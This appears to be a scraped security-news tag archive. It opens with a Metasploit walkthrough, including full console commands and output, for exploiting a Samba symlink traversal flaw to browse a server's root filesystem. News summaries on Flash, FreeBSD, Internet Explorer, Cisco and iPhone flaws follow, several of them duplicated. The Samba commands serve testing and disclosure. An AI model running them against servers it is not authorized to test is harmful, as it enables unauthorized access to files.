Last night, Kingcope uploaded a video to youtube demonstrating a logic flaw in the Samba CIFS service (this was followed by a mailing list post). This bug allows any user with write access to a file share to create a symbolic link to the root filesystem. From this link, the user can access any file on the system with their current privileges. This affects any Samba service that allows anonymous write access, however read access to the filesystem is limited by normal user-level privileges. In most cases, anonymous users are limited to the 'nobody' account, limiting the damage possible through this exploit.
A Metasploit auxiliary module has been added to verify and test this vulnerability. Update to SVN revision 8369 or newer and start up the Metasploit Console:
$ msfconsole
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.0.2
msf auxiliary(samba_symlink_traversal) > set SMBSHARE shared
msf auxiliary(samba_symlink_traversal) > set SMBTARGET rooted
msf auxiliary(samba_symlink_traversal) > run
[*] Connecting to the server...
[*] Trying to mount writeable share 'shared'...
[*] Trying to link 'rooted' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\192.168.0.2\shared\rooted\
Keep in mind that non-anonymous shares can be used as well, just enter SMBUser and SMBPass for a valid user account.
Tag Archives: flaw
XP users should upgrade their Flash installation ASAP
Filed under Security News
Tagged as adobe, advisory, Flash, flaw, outdated, security, Vulnerabilities
Tagged as adobe, advisory, Flash, flaw, outdated, security, Vulnerabilities
Adobe Flash Player 6, the version of that online graphics framework that came pre-installed with Windows XP, has been found to contain numerous security flaws, according to Microsoft.
The software giant yesterday issued a security advisory, stating that the vulnerabilities could enable "a specially crafted web page" to remotely execute code on machines running Flash Player 6. Ars Technica notes that Adobe stopped providing security updates for the outdated player in 2006.
Microsoft recommended that XP users immediately update their Flash installation to a newer version, describing the vulnerability as "severe." Users of old versions of Flash running on new operating systems were still vulnerable, though less so than XP users. The company said that it was not aware of any live exploits, but warned that the possibility was certainly there.
Older, unpatched versions of most software are much more likely to be vulnerable to spyware or viruses, experts say. Users are encouraged to update their programs, plug-ins, and operating systems as often as possible to stay ahead of the numerous digital threats present online.
The software giant yesterday issued a security advisory, stating that the vulnerabilities could enable "a specially crafted web page" to remotely execute code on machines running Flash Player 6. Ars Technica notes that Adobe stopped providing security updates for the outdated player in 2006.
Microsoft recommended that XP users immediately update their Flash installation to a newer version, describing the vulnerability as "severe." Users of old versions of Flash running on new operating systems were still vulnerable, though less so than XP users. The company said that it was not aware of any live exploits, but warned that the possibility was certainly there.
Older, unpatched versions of most software are much more likely to be vulnerable to spyware or viruses, experts say. Users are encouraged to update their programs, plug-ins, and operating systems as often as possible to stay ahead of the numerous digital threats present online.
FreeBSD hit with local root vulnerability, patch rushed into service
Filed under Security News
Tagged as code, Critical, exploit, flaw, FreeBSD, Full Disclosure, Kingcope, local, malicious, patch, root, security, vulnerability
Tagged as code, Critical, exploit, flaw, FreeBSD, Full Disclosure, Kingcope, local, malicious, patch, root, security, vulnerability
The makers of open-source operating system FreeBSD released a hurried patch to correct what has been described as a critical security flaw affecting its local root system. The flaw could allow malicious code to be executed with full administrative rights on affected systems.
An exploit for the flaw, published on the Full Disclosure computer security mailing list, was created by a Full Disclosure user known by the online handle Kingcope. Kingcope writes that the "bug resides in the Run-Time Link Editor (rtld)" whose security provisions can be circumvented relatively simply.
Colin Percival, FreeBSD's security officer, recently announced the availability of an emergency patch, which fixes the vulnerability. Percival did warn, however, that due to the immediate need for a patch, the project was conducted with an eye to speed rather than accuracy, and emphasizes that downloading and using the patch is at the user's own risk.
The exploit is one of the first in recent memory published for an open-source OS; most recent published exploits have targeted Microsoft or Google products.
An exploit for the flaw, published on the Full Disclosure computer security mailing list, was created by a Full Disclosure user known by the online handle Kingcope. Kingcope writes that the "bug resides in the Run-Time Link Editor (rtld)" whose security provisions can be circumvented relatively simply.
Colin Percival, FreeBSD's security officer, recently announced the availability of an emergency patch, which fixes the vulnerability. Percival did warn, however, that due to the immediate need for a patch, the project was conducted with an eye to speed rather than accuracy, and emphasizes that downloading and using the patch is at the user's own risk.
The exploit is one of the first in recent memory published for an open-source OS; most recent published exploits have targeted Microsoft or Google products.
New zero-day flaw discovered in older versions of Internet Explorer
Filed under Security News
Tagged as exploit, flaw, IE, javascript, malware, Symantec, vulnerability, zero-day
Tagged as exploit, flaw, IE, javascript, malware, Symantec, vulnerability, zero-day
Security researchers at Symantec report that new malware has targeted a memory corruption vulnerability in Internet Explorer 6 and 7, which carries the potential for system crashes or malicious redirects.
The company revealed the vulnerability in a blog post over the weekend, saying that, while the current iteration of the malware showed "signs of poor reliability," they expect well-written exploit code to hit the internet in "the near future." The Javascript-based exploit - which the researchers have dubbed Bloodhound.Exploit.129 - requires prospective victims to visit an infected website.
As usual, the best way to avoid being infected by this malware is to ensure that all of the latest security patches and updates have been applied. Symantec recommends disabling Javascript and only visiting trusted websites until Microsoft can release a bugfix for the vulnerability.
Though long since superseded by Internet Explorer 8, Internet Explorer 6 and 7 are still widely used by some enterprise consumers for reasons of compatibility and familiarity. Experts recommend upgrading to the latest version and keeping all software patched.
The company revealed the vulnerability in a blog post over the weekend, saying that, while the current iteration of the malware showed "signs of poor reliability," they expect well-written exploit code to hit the internet in "the near future." The Javascript-based exploit - which the researchers have dubbed Bloodhound.Exploit.129 - requires prospective victims to visit an infected website.
As usual, the best way to avoid being infected by this malware is to ensure that all of the latest security patches and updates have been applied. Symantec recommends disabling Javascript and only visiting trusted websites until Microsoft can release a bugfix for the vulnerability.
Though long since superseded by Internet Explorer 8, Internet Explorer 6 and 7 are still widely used by some enterprise consumers for reasons of compatibility and familiarity. Experts recommend upgrading to the latest version and keeping all software patched.
Microsoft counts Chrome coup with discovery of security flaw
Security researchers at Microsoft recently discovered a security vulnerability in Google's controversial Chrome Frame for Internet Explorer, a browser plug-in that simulates Chrome functionality within an Internet Explorer session.
The vulnerability, which was fixed by Google in a patch pushed out on Wednesday, could have been used to design a cross-origin bypass to gain unauthorized access to the systems on which Chrome Frame was running, although Google says that it was unaware of any active exploits and that the vulnerability would not have allowed "persistent" malware access.
Chrome Frame has been a thorn in the side of Microsoft since its release, with the Redmond giant saying that it made Internet Explorer users less secure while browsing. Until this vulnerability was discovered, however, the company had no evidence of any insecurity.
Chrome Frame's silent, automatic update - a common feature of Google products - has also drawn fire, with critics saying that the company violates its customers' right to control what software is installed on their PCs. Google has responded by asserting that the automatic patching ensures that all users are protected against the latest threats.
The vulnerability, which was fixed by Google in a patch pushed out on Wednesday, could have been used to design a cross-origin bypass to gain unauthorized access to the systems on which Chrome Frame was running, although Google says that it was unaware of any active exploits and that the vulnerability would not have allowed "persistent" malware access.
Chrome Frame has been a thorn in the side of Microsoft since its release, with the Redmond giant saying that it made Internet Explorer users less secure while browsing. Until this vulnerability was discovered, however, the company had no evidence of any insecurity.
Chrome Frame's silent, automatic update - a common feature of Google products - has also drawn fire, with critics saying that the company violates its customers' right to control what software is installed on their PCs. Google has responded by asserting that the automatic patching ensures that all users are protected against the latest threats.
Internet Explorer security flaw affects Firefox browser
Microsoft's release of its monthly security update on Tuesday contained fixes for three vulnerabilities affecting all versions of Internet Explorer, including one vulnerability that could be exploited on the .NET Framework to infect users of the Firefox browser.
The patch CVE-2009-2529 fixes a vulnerability in the Windows Presentation Foundation (WPF) component that could be exploited in a browse-and-get owned scenario by visiting a malicious website.
"While the vulnerability is in an IE component, there is an attack vector for Firefox users as well," Microsoft said on its IE Blog. "The reason is that .NET Framework 3.5 SP1 installs a 'Windows Presentation Foundation' plug-in in Firefox."
That means Firefox users with .NET Framework 3.5 who visit a malicious website could have their Windows PCs hijacked using this vulnerability.
Microsoft said a workaround to mitigate the problem involves disabling the XBAP (XAML Browser Application) in the internet zone under security settings.
Firefox users can disable the Windows Presentation Foundation under Tools, Add-ons and then Plug-ins.
The security update is rated critical for all IE versions including IE 5.0, IE 6, IE 6 SP1, IE 7 and IE 8, including the version shipped with Windows 7.
The patch CVE-2009-2529 fixes a vulnerability in the Windows Presentation Foundation (WPF) component that could be exploited in a browse-and-get owned scenario by visiting a malicious website.
"While the vulnerability is in an IE component, there is an attack vector for Firefox users as well," Microsoft said on its IE Blog. "The reason is that .NET Framework 3.5 SP1 installs a 'Windows Presentation Foundation' plug-in in Firefox."
That means Firefox users with .NET Framework 3.5 who visit a malicious website could have their Windows PCs hijacked using this vulnerability.
Microsoft said a workaround to mitigate the problem involves disabling the XBAP (XAML Browser Application) in the internet zone under security settings.
Firefox users can disable the Windows Presentation Foundation under Tools, Add-ons and then Plug-ins.
The security update is rated critical for all IE versions including IE 5.0, IE 6, IE 6 SP1, IE 7 and IE 8, including the version shipped with Windows 7.
Cisco wireless LAN access points vulnerable to hacker attack
Filed under Security News
Tagged as access point, AirMagnet, AP, Cisco, flaw, LAN, OTAP, Over-the-Air-Provisioning, security, wireless
Tagged as access point, AirMagnet, AP, Cisco, flaw, LAN, OTAP, Over-the-Air-Provisioning, security, wireless
Security researchers at AirMagnet have uncovered a security flaw in Cisco's wireless LAN infrastructure that could allow a hacker to hijack a wireless access point to gain access to a customer's network.
The vulnerability involves Cisco's Over-the-Air-Provisioning (OTAP) feature found in its wireless access points (APs). The OTAP feature allows a Cisco AP that is not connected to a Cisco controller to listen to traffic from other nearby Cisco APs and use that information to quickly locate a nearby WLAN controller to associate to.
AirMagnet said there is an unintentional exposure or leakage of information in all lightweight Cisco APs and the potential for APs to be incorrectly assigned to an outside Cisco controller (what the researchers call "SkyJacked") either by accident or at the direction of a potential hacker.
The potential exists for the Cisco AP to "hear" multicast traffic from a neighboring network and incorrectly connect to a neighbor or otherwise unapproved Cisco controller. This ultimately could lead to an enterprise's access point connecting outside of the company to an outside controller and therefore being under outside control.
This same mechanism could be done intentionally by a hacker to purposely SkyJack APs and take control of an enterprise's access point.
AirMagnet said it has informed Cisco of this vulnerability and potential exploit. Cisco is "taking appropriate actions."
The vulnerability involves Cisco's Over-the-Air-Provisioning (OTAP) feature found in its wireless access points (APs). The OTAP feature allows a Cisco AP that is not connected to a Cisco controller to listen to traffic from other nearby Cisco APs and use that information to quickly locate a nearby WLAN controller to associate to.
AirMagnet said there is an unintentional exposure or leakage of information in all lightweight Cisco APs and the potential for APs to be incorrectly assigned to an outside Cisco controller (what the researchers call "SkyJacked") either by accident or at the direction of a potential hacker.
The potential exists for the Cisco AP to "hear" multicast traffic from a neighboring network and incorrectly connect to a neighbor or otherwise unapproved Cisco controller. This ultimately could lead to an enterprise's access point connecting outside of the company to an outside controller and therefore being under outside control.
This same mechanism could be done intentionally by a hacker to purposely SkyJack APs and take control of an enterprise's access point.
AirMagnet said it has informed Cisco of this vulnerability and potential exploit. Cisco is "taking appropriate actions."
iPhone security flaw: deleted emails not really deleted
A blogger at the gadget site Gizmodo has uncovered a potential email security flaw in iPhone OS 3.0. After deleting emails it is still possible to recover them using the search function, even though the emails no longer appear in the main mail interface, the site reported.
A purported Apple insider told Gizmodo that the company is aware of the issue and would probably have a fix for the flaw in iPhone OS 3.1.
The problem with being able to access emails that were supposed to have been deleted is that a user could accidentally open old messages containing links to malware or malicious attachments that could be used to hijack the iPhone.
Security firm Trend Micro recently surveyed iPhone users and found that they are more likely to send and receive email as well as click on URLs in email or open an email attachment than other smartphone users.
Nearly half of the iPhone users surveyed (44 percent) said surfing the web from their phone is as safe or safer than from a PC, despite the fact that many do not have security software on the phone.
Other iPhone security risks have been uncovered by hackers, including the ability to take over the iPhone to steal data or send out spam using a maliciously crafted text message.
A purported Apple insider told Gizmodo that the company is aware of the issue and would probably have a fix for the flaw in iPhone OS 3.1.
The problem with being able to access emails that were supposed to have been deleted is that a user could accidentally open old messages containing links to malware or malicious attachments that could be used to hijack the iPhone.
Security firm Trend Micro recently surveyed iPhone users and found that they are more likely to send and receive email as well as click on URLs in email or open an email attachment than other smartphone users.
Nearly half of the iPhone users surveyed (44 percent) said surfing the web from their phone is as safe or safer than from a PC, despite the fact that many do not have security software on the phone.
Other iPhone security risks have been uncovered by hackers, including the ability to take over the iPhone to steal data or send out spam using a maliciously crafted text message.
Black Hat: Hacker exposes iPhone SMS flaw
Filed under Security News
Tagged as Black Hat, crash, exposes, flaw, hacker, iPhone, SMS, vulnerability
Tagged as Black Hat, crash, exposes, flaw, hacker, iPhone, SMS, vulnerability
A professional hacker and security researcher exposed a flaw in Apple's iPhone 3GS which could allow a hacker to hijack the phone as part of a botnet or crash the phone, at the Black Hat 2009 security conference in Las Vegas.
Charlie Miller, an authority on Mac OS X security and the co-author of the Mac Hacker's Handbook, said a SMS flaw could allow an attacker to use text messages to remotely execute malicious code to hijack the device or cause it to crash.
Miller, who had discussed the iPhone security bug at a security conference in Singapore earlier this month, said previously he was able to use a vulnerability in the way the iPhone receives text messages to remotely crash the phone.
He said hackers could theoretically exploit the vulnerability to monitor the location of the phone using GPS, turn on the phone's microphone to eavesdrop on conversations or hijack the phone as part of a botnet to send SMS spam or launch distributed denial-of-service attacks (DDoS).
Miller also warned that "jailbreaking" an iPhone to add software or capabilities not offered by Apple leaves the device vulnerable to hacking and viruses.
"If you care about security, don't use a jailbroken iPhone," Miller said.
Charlie Miller, an authority on Mac OS X security and the co-author of the Mac Hacker's Handbook, said a SMS flaw could allow an attacker to use text messages to remotely execute malicious code to hijack the device or cause it to crash.
Miller, who had discussed the iPhone security bug at a security conference in Singapore earlier this month, said previously he was able to use a vulnerability in the way the iPhone receives text messages to remotely crash the phone.
He said hackers could theoretically exploit the vulnerability to monitor the location of the phone using GPS, turn on the phone's microphone to eavesdrop on conversations or hijack the phone as part of a botnet to send SMS spam or launch distributed denial-of-service attacks (DDoS).
Miller also warned that "jailbreaking" an iPhone to add software or capabilities not offered by Apple leaves the device vulnerable to hacking and viruses.
"If you care about security, don't use a jailbroken iPhone," Miller said.
Adobe fixes Flash flaws caused by bad Microsoft code
Adobe issued web security patches yesterday for flaws in Flash Player and Shockwave that were caused by vulnerable code in the Microsoft Active Template Library (ATL), a code library included with Visual Studio for developing software.
Adobe said the flaws could allow a remote attacker to take control of a system. Adobe is making updates available for Reader and Acrobat v9.1.2 for Windows, Macintosh and UNIX to fix the security bugs. Adobe Shockwave Player 11.5.0.600 and earlier versions on Windows are also affected.
Microsoft earlier this week had patched the critical bugs in Visual Studio, which were related to an errant ampersand (&) in the code. But any software developed using the code remained vulnerable to attacks.
"We determined that Flash Player and Shockwave Player are the two products that leverage vulnerable versions of ATL," Adobe's security response team said on its blog.
Only Internet Explorer plug-ins are vulnerable to the Flash bug, so people using Flash Player within the Firefox browser or other Windows browsers are not vulnerable, Adobe said.
Hackers have actively targeted the Flash security holes using drive-by download or "browse-and-get-owned" attacks hosted on compromised websites.
Adobe said the flaws could allow a remote attacker to take control of a system. Adobe is making updates available for Reader and Acrobat v9.1.2 for Windows, Macintosh and UNIX to fix the security bugs. Adobe Shockwave Player 11.5.0.600 and earlier versions on Windows are also affected.
Microsoft earlier this week had patched the critical bugs in Visual Studio, which were related to an errant ampersand (&) in the code. But any software developed using the code remained vulnerable to attacks.
"We determined that Flash Player and Shockwave Player are the two products that leverage vulnerable versions of ATL," Adobe's security response team said on its blog.
Only Internet Explorer plug-ins are vulnerable to the Flash bug, so people using Flash Player within the Firefox browser or other Windows browsers are not vulnerable, Adobe said.
Hackers have actively targeted the Flash security holes using drive-by download or "browse-and-get-owned" attacks hosted on compromised websites.